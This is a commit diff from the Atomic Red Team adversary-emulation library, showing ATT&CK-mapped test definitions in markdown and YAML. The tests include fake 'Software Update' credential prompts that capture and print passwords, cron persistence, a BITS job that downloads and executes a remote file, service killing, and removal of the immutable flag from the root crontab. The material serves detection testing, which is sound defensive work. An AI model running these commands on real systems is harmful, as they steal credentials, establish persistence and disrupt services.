cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt
atomics/T1141/T1141.md
+10 -12
View File
@@ -1,28 +1,26 @@
# T1141 - Input Prompt
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1141)
<blockquote>When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task. Adversaries can mimic this functionality to prompt users for credentials with a normal-looking prompt. This type of prompt can be accomplished with AppleScript:
<blockquote>When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).
<code>set thePassword to the text returned of (display dialog "AdobeUpdater needs permission to check for updates. Please authenticate." default answer "")</code>
(Citation: OSX Keydnap malware)
Adversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite. (Citation: OSX Malware Exploits MacKeeper)</blockquote>
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).</blockquote>
## Atomic Tests
- [Atomic Test #1 - Prompt User for Password](#atomic-test-1---prompt-user-for-password)
- [Atomic Test #1 - PowerShell - Prompt User for Password](#atomic-test-1---powershell---prompt-user-for-password)
<br/>
## Atomic Test #1 - Prompt User for Password
Prompt User for Password (Local Phishing)
Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
## Atomic Test #1 - PowerShell - Prompt User for Password
Prompt User for Password (Local Phishing) as seen in Stitch RAT.
**Supported Platforms:** macOS
Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
**Supported Platforms:** Windows
#### Run it with `sh`!
#### Run it with `command_prompt`!
```
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;}
```
<br/>
atomics/T1141/T1141.yaml
+16 -1
View File
@@ -3,7 +3,7 @@ attack_technique: T1141
display_name: Input Prompt
atomic_tests:
- name: Prompt User for Password
- name: AppleScript - Prompt User for Password
description: |
Prompt User for Password (Local Phishing)
Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
@@ -16,3 +16,18 @@ atomic_tests:
name: sh
command: |
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
atomic_tests:
- name: PowerShell - Prompt User for Password
description: |
Prompt User for Password (Local Phishing) as seen in Stitch RAT.
Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
supported_platforms:
- windows
executor:
name: command_prompt
command: |
powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;}
atomics/T1150/T1150.md
+1 -1
View File
@@ -1,6 +1,6 @@
# T1150 - Plist Modification
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1150)
<blockquote>Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UT-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user's privileges).
<blockquote>Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user's privileges).
Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)</blockquote>
## Atomic Tests
atomics/T1155/T1155.md
+1 -1
View File
@@ -3,7 +3,7 @@
<blockquote>macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program.
AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command lie via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>.</blockquote>
Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>.</blockquote>
## Atomic Tests
atomics/T1168/T1168.md
+31 -9
View File
@@ -18,15 +18,17 @@ Each launchd job is described by a different configuration property list (plist)
## Atomic Tests
- [Atomic Test #1 - Cron Job](#atomic-test-1---cron-job)
- [Atomic Test #1 - Cron - Replace crontab with referenced file](#atomic-test-1---cron---replace-crontab-with-referenced-file)
- [Atomic Test #2 - Cron Job](#atomic-test-2---cron-job)
- [Atomic Test #2 - Cron - Add script to cron folder](#atomic-test-2---cron---add-script-to-cron-folder)
- [Atomic Test #3 - Event Monitor Daemon Persistence](#atomic-test-3---event-monitor-daemon-persistence)
<br/>
## Atomic Test #1 - Cron Job
Set a cron job
## Atomic Test #1 - Cron - Replace crontab with referenced file
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
@@ -34,17 +36,37 @@ Set a cron job
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script | Script to execute | path | /tmp/evil.sh|
| command | Command to execute | string | /tmp/evil.sh|
| tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil|
#### Run it with `sh`!
#### Run it with `bash`!
```
echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
```
<br/>
<br/>
## Atomic Test #2 - Cron Job
Manually set a cron job
## Atomic Test #2 - Cron - Add script to cron folder
This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
| cron_script_name | Name of file to store in cron folder | string | persistevil|
#### Run it with `bash`!
```
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
```
<br/>
<br/>
## Atomic Test #3 - Event Monitor Daemon Persistence
This test adds persistence via a plist to execute via the macOS Event Monitor Daemon.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
atomics/T1168/T1168.yaml
+38 -9
View File
@@ -3,9 +3,9 @@ attack_technique: T1168
display_name: Local Job Scheduling
atomic_tests:
- name: Cron Job
- name: Cron - Replace crontab with referenced file
description: |
Set a cron job
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
supported_platforms:
- macos
@@ -14,19 +14,48 @@ atomic_tests:
- linux
input_arguments:
script:
description: Script to execute
type: path
command:
description: Command to execute
type: string
default: /tmp/evil.sh
tmp_cron:
description: Temporary reference file to hold evil cron schedule
type: path
default: /tmp/persistevil
executor:
name: sh
name: bash
command: |
echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
- name: Cron Job
- name: Cron - Add script to cron folder
description: |
Manually set a cron job
This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
supported_platforms:
- macos
- centos
- ubuntu
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
name: bash
command: |
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
- name: Event Monitor Daemon Persistence
description: |
This test adds persistence via a plist to execute via the macOS Event Monitor Daemon.
supported_platforms:
- macos
atomics/T1179/T1179.md
+3 -1
View File
@@ -1,6 +1,8 @@
# T1179 - Hooking
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1179)
<blockquote>Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:
<blockquote>Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions.
Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a processs IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)
atomics/T1180/T1180.md
+3 -1
View File
@@ -1,6 +1,8 @@
# T1180 - Screensaver
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1180)
<blockquote>Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. (Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.exe is located in <code>C:\Windows\System32\</code> along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:
<blockquote>Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:
* <code>SCRNSAVE.exe</code> - set to malicious PE path
* <code>ScreenSaveActive</code> - set to '1' to enable the screensaver
atomics/T1197/T1197.md
+4 -3
View File
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1197)
<blockquote>Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1086) (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITS)Admin
The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1086) (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016)
@@ -60,7 +60,7 @@ Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{lo
<br/>
## Atomic Test #3 - Persist, Download, & Execute
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.
**Supported Platforms:** Windows
@@ -73,13 +73,14 @@ and execute a payload in multiple steps. This job will remain in the BITS queue
| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| local_file | Local file path to save downloaded file | path | C:\Windows\Temp\bitsadmin_flag.ps1|
| command_path | Path of command to execute | path | C:\Windows\system32\notepad.exe|
| command_line | Command line to execute | string | notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1|
| command_line | Command line to execute | string | C:\Windows\Temp\bitsadmin_flag.ps1|
#### Run it with `command_prompt`!
```
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
bitsadmin.exe /complete AtomicBITS
bitsadmin.exe /resume #{bits_job_name}
```
<br/>
atomics/T1197/T1197.yaml
+4 -3
View File
@@ -45,7 +45,7 @@ atomic_tests:
- name: Persist, Download, & Execute
description: |
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.
supported_platforms:
- windows
@@ -69,11 +69,12 @@ atomic_tests:
command_line:
description: Command line to execute
type: string
default: notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1
default: C:\Windows\Temp\bitsadmin_flag.ps1
executor:
name: command_prompt
command: |
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
bitsadmin.exe /resume #{bits_job_name}
bitsadmin.exe /complete AtomicBITS
bitsadmin.exe /resume #{bits_job_name}
atomics/T1202/T1202.md
+1 -1
View File
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1202)
<blockquote>Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106).</blockquote>
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.</blockquote>
## Atomic Tests
atomics/T1218/T1218.md
+16 -4
View File
@@ -2,16 +2,28 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218)
<blockquote>Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.
### Msiexec.exe
Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)
* <code>msiexec.exe /q /i "C:\path\to\file.msi"</code>
* <code>msiexec.exe /q /i http[:]//site[.]com/file.msi</code>
* <code>msiexec.exe /y "C:\path\to\file.dll"</code>
### Mavinject.exe
Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)
<code>"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL></code>
<code>C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL></code>
* <code>"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</code>
* <code>C:\Windows\system32\mavinject.exe &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</code>
### SyncAppvPublishingServer.exe
SyncAppvPublishingServer.exe can be used to run powershell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)
SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)
Several others binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)</blockquote>
### Odbcconf.exe
Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to [Regsvr32](https://attack.mitre.org/techniques/T1117) with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
* <code>odbcconf.exe /S /A &lbrace;REGSVR "C:\Users\Public\file.dll"&rbrace;</code>
Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)</blockquote>
## Atomic Tests
atomics/T1220/T1220.md
+6 -6
View File
@@ -37,8 +37,8 @@ Executes the code specified within a XSL script tag during XSL transformation us
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxsl-xmlfile.xml|
| xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxsl-script.xsl|
| xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml|
| xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl|
#### Run it with `command_prompt`!
```
@@ -56,8 +56,8 @@ Executes the code specified within a XSL script tag during XSL transformation us
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-xmlfile.xml|
| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-script.xsl|
| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml|
| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl|
#### Run it with `command_prompt`!
```
@@ -76,7 +76,7 @@ Executes the code specified within a XSL script using a local payload.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| wmic_command | WMI command to execute using wmic.exe | string | process list|
| local_xsl_file | Location of the test XSL script file on the local filesystem. | path | C:\AtomicRedTeam\atomics\T1220\src\wmic-script.xsl|
| local_xsl_file | Location of the test XSL script file on the local filesystem. | path | C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl|
#### Run it with `command_prompt`!
```
@@ -95,7 +95,7 @@ Executes the code specified within a XSL script using a remote payload.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| wmic_command | WMI command to execute using wmic.exe | string | process list|
| remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl|
| remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl|
#### Run it with `command_prompt`!
```
atomics/T1220/T1220.yaml
+6 -6
View File
@@ -12,11 +12,11 @@ atomic_tests:
xmlfile:
description: Location of the test XML file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1220\src\msxsl-xmlfile.xml
default: C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml
xslfile:
description: Location of the test XSL script file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1220\src\msxsl-script.xsl
default: C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl
executor:
name: command_prompt
command: |
@@ -31,11 +31,11 @@ atomic_tests:
xmlfile:
description: Remote location (URL) of the test XML file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-xmlfile.xml
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
xslfile:
description: Remote location (URL) of the test XSL script file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-script.xsl
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
executor:
name: command_prompt
command: |
@@ -54,7 +54,7 @@ atomic_tests:
local_xsl_file:
description: Location of the test XSL script file on the local filesystem.
type: path
default: C:\AtomicRedTeam\atomics\T1220\src\wmic-script.xsl
default: C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl
executor:
name: command_prompt
command: |
@@ -73,7 +73,7 @@ atomic_tests:
remote_xsl_file:
description: Remote location of an XSL payload.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
executor:
name: command_prompt
command: |
atomics/T1220/src/msxsl-script.xsl → atomics/T1220/src/msxslscript.xsl
View File
atomics/T1220/src/msxsl-xmlfile.xml → atomics/T1220/src/msxslxmlfile.xml
View File
atomics/T1220/src/wmic-script.xsl → atomics/T1220/src/wmicscript.xsl
View File
atomics/T1222/T1222.md
+21
View File
@@ -36,6 +36,8 @@ Adversaries may modify file permissions/attributes to evade intended DACLs. (Cit
- [Atomic Test #15 - chown - Change file or folder ownership recursively](#atomic-test-15---chown---change-file-or-folder-ownership-recursively)
- [Atomic Test #16 - chattr - Remove immutable file attribute](#atomic-test-16---chattr---remove-immutable-file-attribute)
<br/>
@@ -321,3 +323,22 @@ Changes a file or folder's ownership only recursively using chown.
chown #{owner} #{file_or_folder} -R
```
<br/>
<br/>
## Atomic Test #16 - chattr - Remove immutable file attribute
Remove's a file's `immutable` attribute using `chattr`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
**Supported Platforms:** macOS, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_modify | Path of the file | path | /var/spool/cron/root|
#### Run it with `sh`!
```
chattr -i #{file_to_modify}
```
<br/>
atomics/T1222/T1222.yaml
+19
View File
@@ -334,3 +334,22 @@ atomic_tests:
name: bash
command: |
chown #{owner} #{file_or_folder} -R
- name: chattr - Remove immutable file attribute
description: |
Remove's a file's `immutable` attribute using `chattr`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- macos
- linux
input_arguments:
file_to_modify:
description: Path of the file
type: path
default: /var/spool/cron/root
executor:
name: sh
command: |
chattr -i #{file_to_modify}
atomics/T1489/T1489.md
+70
View File
@@ -0,0 +1,70 @@
# T1489 - Service Stop
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1489)
<blockquote>Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Windows - Stop service using Service Controller](#atomic-test-1---windows---stop-service-using-service-controller)
- [Atomic Test #2 - Windows - Stop service using net.exe](#atomic-test-2---windows---stop-service-using-netexe)
- [Atomic Test #3 - Windows - Stop service by killing process](#atomic-test-3---windows---stop-service-by-killing-process)
<br/>
## Atomic Test #1 - Windows - Stop service using Service Controller
Stops a specified service using the sc.exe command.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | Name of a service to stop | String | spooler|
#### Run it with `command_prompt`!
```
sc.exe stop #{service_name}
```
<br/>
<br/>
## Atomic Test #2 - Windows - Stop service using net.exe
Stops a specified service using the net.exe command.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | Name of a service to stop | String | spooler|
#### Run it with `command_prompt`!
```
net.exe stop #{service_name}
```
<br/>
<br/>
## Atomic Test #3 - Windows - Stop service by killing process
Stops a specified service killng the service's process.
This technique was used by WannaCry.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_name | Name of a process to kill | String | sqlwriter.exe|
#### Run it with `command_prompt`!
```
taskkill.exe /f /im #{process_name}
```
<br/>
atomics/T1489/T1489.yaml
+59
View File
@@ -0,0 +1,59 @@
---
attack_technique: T1489
display_name: Service Stop
atomic_tests:
- name: Windows - Stop service using Service Controller
description: |
Stops a specified service using the sc.exe command.
supported_platforms:
- windows
input_arguments:
service_name:
description: Name of a service to stop
type: String
default: spooler
executor:
name: command_prompt
command: |
sc.exe stop #{service_name}
- name: Windows - Stop service using net.exe
description: |
Stops a specified service using the net.exe command.
supported_platforms:
- windows
input_arguments:
service_name:
description: Name of a service to stop
type: String
default: spooler
executor:
name: command_prompt
command: |
net.exe stop #{service_name}
- name: Windows - Stop service by killing process
description: |
Stops a specified service killng the service's process.
This technique was used by WannaCry.
supported_platforms:
- windows
input_arguments:
process_name:
description: Name of a process to kill
type: String
default: sqlwriter.exe
executor:
name: command_prompt
command: |
taskkill.exe /f /im #{process_name}
atomics/index.md
+80 -18
View File
@@ -38,6 +38,7 @@
- Atomic Test #2: Create a user account on a MacOS system [macos]
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -72,8 +73,9 @@
- [T1152 Launchctl](./T1152/T1152.md)
- Atomic Test #1: Launchctl [macos]
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- T1162 Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037 Logon Scripts](./T1037/T1037.md)
- Atomic Test #1: Logon Scripts [windows]
@@ -111,6 +113,7 @@
- [T1180 Screensaver](./T1180/T1180.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1101 Security Support Provider](./T1101/T1101.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1166 Setuid and Setgid](./T1166/T1166.md)
- Atomic Test #1: Setuid and Setgid [macos, centos, ubuntu, linux]
@@ -121,11 +124,13 @@
- Atomic Test #1: Startup Items [macos]
- Atomic Test #2: Startup Items (emond rule) [macos]
- T1019 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1501 Systemd Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
